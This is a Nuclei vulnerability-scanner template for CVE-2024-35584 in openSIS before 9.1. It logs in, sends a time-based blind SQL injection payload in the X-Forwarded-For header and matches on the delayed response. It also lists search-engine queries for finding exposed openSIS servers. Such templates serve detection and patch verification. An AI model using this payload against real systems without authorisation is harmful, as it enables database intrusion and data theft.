id: CVE-2024-35584

info:
  name: openSIS < 9.1 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php and functions/HackingLogFnc.php in openSIS Community Edition 9.1, 8.0, and possibly earlier versions. An authenticated user can perform SQL injection due to a lack of sanitisation: the application takes an arbitrary value from the "X-Forwarded-For" header and appends it directly to a SQL INSERT statement, leading to SQL injection.
  impact: |
    Authenticated attackers can perform SQL injection via the X-Forwarded-For header, potentially extracting or modifying sensitive database information.
  remediation: |
    Update openSIS to a version later than 9.1 that patches the SQL injection vulnerability.
  reference:
    - https://www.tenable.com/cve/CVE-2024-35584
    - https://vuldb.com/?id.280406
    - https://github.com/whwhwh96/CVE-2024-35584
    - https://github.com/OS4ED/openSIS-Classic
    - http://opensis.com
    - https://nvd.nist.gov/vuln/detail/CVE-2024-35584
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-35584
    cwe-id: CWE-89
    epss-score: 0.85174
    epss-percentile: 0.99371
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query: http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2024,opensis,authenticated,sqli,vuln

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        @timeout 20s
        GET /Ajax.php?modname=tools/notallowed.php HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1

    matchers:
      - type: dsl
        dsl:
          - duration_2>=7
          - contains(body_1, "openSIS") && contains_all(body_2, "donetext:", "\'Done\'")
          - status_code_1 == 200 && status_code_2 == 200
        condition: and
# digest: 4a0a00473045022100b47bb7ec705e3a3826fc5f7c27f3a0e0a92e62e7e103f7706f3b5ce8b4b38b8a0220231d683dc0de5e9e1cdb1f70c33d321ed8f2db89fd9a91e697b883afb1138dbc:922c64590222798bb761d5b6d8e72950